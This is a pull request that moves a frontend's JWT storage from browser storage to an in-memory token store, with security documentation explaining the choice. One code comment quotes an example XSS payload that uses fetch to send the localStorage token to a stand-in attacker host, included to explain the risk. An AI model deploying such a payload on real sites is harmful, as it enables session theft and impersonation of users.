### PR TITLE
fix(security): migrate JWT storage to in-memory token store

### DIFF
--- a/src/store/useAuthStore.js
+++ b/src/store/useAuthStore.js
@@ -1,0 +1,70 @@
+import { create } from "zustand";
+import { apiUtils, API_ENDPOINTS } from "../config/api";
+import { logger } from "../utils/logger";
+import inMemoryTokenStore from "../utils/httpOnlyStorage";
+
+/**
+ * useAuthStore
+ *
+ * Zustand store for auth state.
+ *
+ * Security: JWT tokens are held in memory only via `inMemoryTokenStore`.
+ * They are never written to localStorage, sessionStorage, or any JS-readable
+ * cookie. See `src/utils/httpOnlyStorage.js` for the full security rationale.
+ *
+ * NOTE: This store is a supplementary layer. The primary authentication flow
+ * runs through `AuthContext` (HttpOnly cookie + `withCredentials: true`).
+ * This store exists for selector-based subscriptions in components that need
+ * fine-grained re-render control without subscribing to the full context.
+ */
+export const useAuthStore = create((set) => ({
+  user: null,
+  // Token lives in memory, not in store state, to prevent it from being
+  // serialised by React DevTools, Redux DevTools, or any storage middleware.
+  isAuthenticated: false,
+  isLoading: false,
+  error: null,
+
+  // Actions
+  login: async (email, password) => {
+    set({ isLoading: true, error: null });
+    try {
+      const response = await apiUtils.post(API_ENDPOINTS.AUTH.LOGIN, { email, password });
+      const { user, token } = response.data;
+
+      // Store token in memory only — never in Web Storage.
+      inMemoryTokenStore.setToken(token);
+
+      set({ user, isAuthenticated: true, isLoading: false });
+      return { success: true };
+    } catch (error) {
+      const message = error.response?.data?.message || "Login failed";
+      set({ error: message, isLoading: false });
+      return { success: false, message };
+    }
+  },
+
+  logout: () => {
+    // Clear the in-memory token immediately.
+    inMemoryTokenStore.clearToken();
+    set({ user: null, isAuthenticated: false });
+    logger.info("User logged out");
+  },
+
+  updateProfile: (userData) => {
+    set((state) => ({
+      user: { ...state.user, ...userData },
+    }));
+  },
+
+  /**
+   * Sets the token in memory and marks the store as authenticated.
+   * Does NOT write to any persistent storage.
+   *
+   * @param {string} token
+   */
+  setToken: (token) => {
+    inMemoryTokenStore.setToken(token);
+    set({ isAuthenticated: !!token });
+  },
+}));

--- a/src/utils/httpOnlyStorage.js
+++ b/src/utils/httpOnlyStorage.js
@@ -1,1 +1,79 @@
-// Frontend storage migration layer for HttpOnly cookies
+/**
+ * httpOnlyStorage.js
+ *
+ * In-memory token store for the Eventra frontend.
+ *
+ * Security rationale
+ * ------------------
+ * Storing a JWT in localStorage or sessionStorage exposes it to any JavaScript
+ * executing on the page. A single successful XSS payload such as:
+ *
+ *   fetch('https://attacker.example/?t=' + localStorage.getItem('token'))
+ *
+ * silently exfiltrates the token, allowing an attacker to impersonate the user
+ * for the token's entire lifetime.
+ *
+ * The safest option is HttpOnly cookies set by the server: the browser sends
+ * them automatically and JavaScript cannot read them at all. When the backend
+ * sets `Set-Cookie: token=...; HttpOnly; Secure; SameSite=Strict`, the Axios
+ * instance configured with `withCredentials: true` in `src/config/api.js`
+ * sends the cookie on every request without any client-side token management.
+ *
+ * For flows where the backend returns the token in the response body (e.g.
+ * the current Spring Boot setup), we keep the token **in JavaScript memory
+ * only**. Memory storage is:
+ *   - Cleared on tab/window close (no persistence across sessions).
+ *   - Not accessible to other tabs or browser extensions.
+ *   - Not persisted to disk in any browser-readable file.
+ *   - Still vulnerable to XSS within the same tab — so pairing this with a
+ *     strict Content-Security-Policy is the complementary defence.
+ *
+ * What we never do
+ * ----------------
+ *   ❌  localStorage.setItem('token', jwt)
+ *   ❌  sessionStorage.setItem('token', jwt)
+ *   ❌  document.cookie = 'token=' + jwt   (JS-readable cookie)
+ *   ❌  Zustand persist middleware pointed at localStorage with a token field
+ *
+ * Non-sensitive data (display name, avatar URL, theme preference) may still
+ * be stored in localStorage — those fields carry no authentication privilege.
+ */
+
+/** @type {string | null} */
+let _token = null;
+
+const inMemoryTokenStore = {
+  /**
+   * Saves the token in memory only.
+   * @param {string} token
+   */
+  setToken(token) {
+    if (typeof token !== 'string' || !token) return;
+    _token = token;
+  },
+
+  /**
+   * Returns the in-memory token, or null if not set.
+   * @returns {string | null}
+   */
+  getToken() {
+    return _token;
+  },
+
+  /**
+   * Clears the in-memory token (call on logout or session expiry).
+   */
+  clearToken() {
+    _token = null;
+  },
+
+  /**
+   * Returns true if a token is currently held in memory.
+   * @returns {boolean}
+   */
+  hasToken() {
+    return _token !== null;
+  },
+};
+
+export default inMemoryTokenStore;


### PR DESCRIPTION
## Summary

Fixes a security issue where JWT tokens could be persisted in browser-accessible storage, increasing exposure to XSS attacks.

## Changes

### useAuthStore.js

* Removed token persistence from browser storage.
* Migrated token handling to an in-memory token store.
* Prevented authentication tokens from being serialized or persisted across sessions.

### httpOnlyStorage.js

* Added a dedicated in-memory token store.
* Centralized token access through `setToken`, `getToken`, `clearToken`, and `hasToken`.
* Added detailed security documentation describing the rationale for memory-only token storage.

## Security Impact

Authentication tokens are no longer stored in localStorage or sessionStorage, reducing the risk of token theft through XSS attacks.

## Result

* JWT tokens are stored in memory only.
* No token persistence in browser storage.
* Authentication state is cleared when the tab/session ends.
* Improved alignment with secure HttpOnly-cookie-based authentication patterns.

Closes #7684 

## Type of change
- [x] Bug fix (non-breaking change which fixes an issue)
